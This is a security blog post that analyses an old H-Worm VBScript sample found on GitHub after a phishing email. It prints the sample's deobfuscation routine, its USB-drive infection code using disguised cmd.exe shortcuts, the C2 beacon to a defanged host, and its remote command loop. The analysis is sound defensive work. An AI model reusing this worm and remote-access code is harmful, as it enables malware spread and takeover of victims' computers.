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Old H-Worm Delivered Through GitHub

Published: 2019-02-14. Last Updated: 2019-02-15 06:40:28 UTC
by Xavier Mertens (Version: 1)
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Another piece of malicious code spotted on GitHub this time. By the way, this is the perfect example to demonstrate that protecting users via a proxy with web-categorization is useless… Event sites from the Alexa Top-1M may deliver malicious content (Github current position is 51[1]). The URL has been found in a classic email phishing attempt. The content was recently uploaded (<24h) when I found it:


Let’s have a look at the archive content:

ISC $ shasum -a 256
ISC $ unzip -t
    testing: Mesures de sécurité.jar   OK
    testing: Habilitations Ebank.vbs   OK
No errors detected in compressed data of
ISC $ shasum -a 256 *
d4ffa2acdec66f15c2252f36311c059ab00cc942b7cb54c33b4257dbc680ed9b  Habilitations Ebank.vbs
7ab54cb93a4a76dd5578f0b0ddcaeb8420311ebb39f27b62e535a43aec02523a  Mesures de sécurité.jar

Let’s have a look at the VBScript code. It’s based on a big class:

Class Values
End Class
Set myClass = new Values

Most part of the code is obfuscated using a simple technique: A chunk of Base64 data is decoded by replacing a set of characters with the letter ‘A’:

Private Function peter_paul(sand, way_off)
  Dim stapler, hp_pc, pillow, ruben
  stapler = "!@"
  hp_pc = "A"
  pillow = "Q29uc3QgVHlw....."
  ruben = Replace(pillow, stapler, hp_pc)
  peter_paul = b642byt_arr(1, ruben, 10)
End Function

Easy to decode with Cyberchef:

The decoded data is a new script. The next step is to execute it::

Public Sub Start()
  Set yhm_pepe = CreateObject("ADODB.Stream")
  Set spike = CreateObject("Microsoft.XMLDOM")
  If john_conor(1, peter_paul(0, False)) = ojor Then
    ExecuteGlobal ojor
  End If
End Sub

The code is simply written to the ADODB.Stream then executed. Here is what the second stage does. It copies itself for persistence in %TEMP%\tGcuACWROu.vbs then install . An interesting behaviour: it scans for available removable drives (drive.type == 1)[2] and infect them:

for each drive in filesystemobj.drives
  if  drive.isready = true then
    if  drive.freespace  > 0 then
      if  drive.drivetype  = 1 then
        filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
        if  filesystemobj.fileexists (drive.path & "\" & installname)  then
          filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
        end if
        for each file in filesystemobj.getfolder( drive.path & "\" ).Files
          if not lnkfile then exit for
            if  instr (,".") then
              if  lcase (split(, ".") (ubound(split(, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase ( <> ucase (installname) then
                  filename = split(,".")
                  set lnkobj = shellobj.createshortcut (drive.path & "\"&filename (0)&".lnk")
                  lnkobj.windowstyle = 7
                  lnkobj.targetpath = "cmd.exe"
                  lnkobj.workingdirectory = ""
                  lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(," ",     chrw(34) & " " & chrw(34)) &"&exit"
                   filleicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." &     split(, ".")(ubound(split(, ".")))& "\") & "\defaulticon\")
                   if  instr (fileicon,",") = 0 then
                     lnkobj.iconlocation = file.path
                     lnkobj.iconlocation = fileicon
                   end if
                 end if
               end if
             end if

When the installation is successful, it starts to communicate with the C2 server:  hxxp://ghanaandco.sytes[.]net:3007.

POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: fr-be
User-Agent: 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019
Accept-Encoding: gzip, deflate
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Here is a reply from the C2 server:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 12
Server: Indy/9.0.18


Here is the main loop waiting for commands:

while true
  response = ""
  response = post ("is-ready","")
  cmd = split (response,spliter)
  select case cmd (0)
    case "excecute"
      param = cmd (1)
      execute param
    case "update"
      param = cmd (1)
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
    case "uninstall"
    case "send"
      download cmd (1),cmd (2)
    case "site-send"
      sitedownloader cmd (1),cmd (2)
    case "recv"
      param = cmd (1)
      upload (param)
    case  "enum-driver"
       post "is-enum-driver",enumdriver
     case  "enum-faf"
       param = cmd (1)
       post "is-enum-faf",enumfaf (param)
     case  "enum-process"
       post "is-enum-process",enumprocess
     case  "cmd-shell"
       param = cmd (1)
       post "is-cmd-shell",cmdshell (param)
     case  "delete"
        param = cmd (1)
        deletefaf (param)
      case  "exit-process"
        param = cmd (1)
        exitprocess (param)
      case  "sleep"
        param = cmd (1)
        sleep = eval (param)
    end select
  wscript.sleep sleep

If the delivery method changed, the malicious code is not new. This is a good old H-Worm as already found in 2013[3]. Old stuff but still used in the wild!


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

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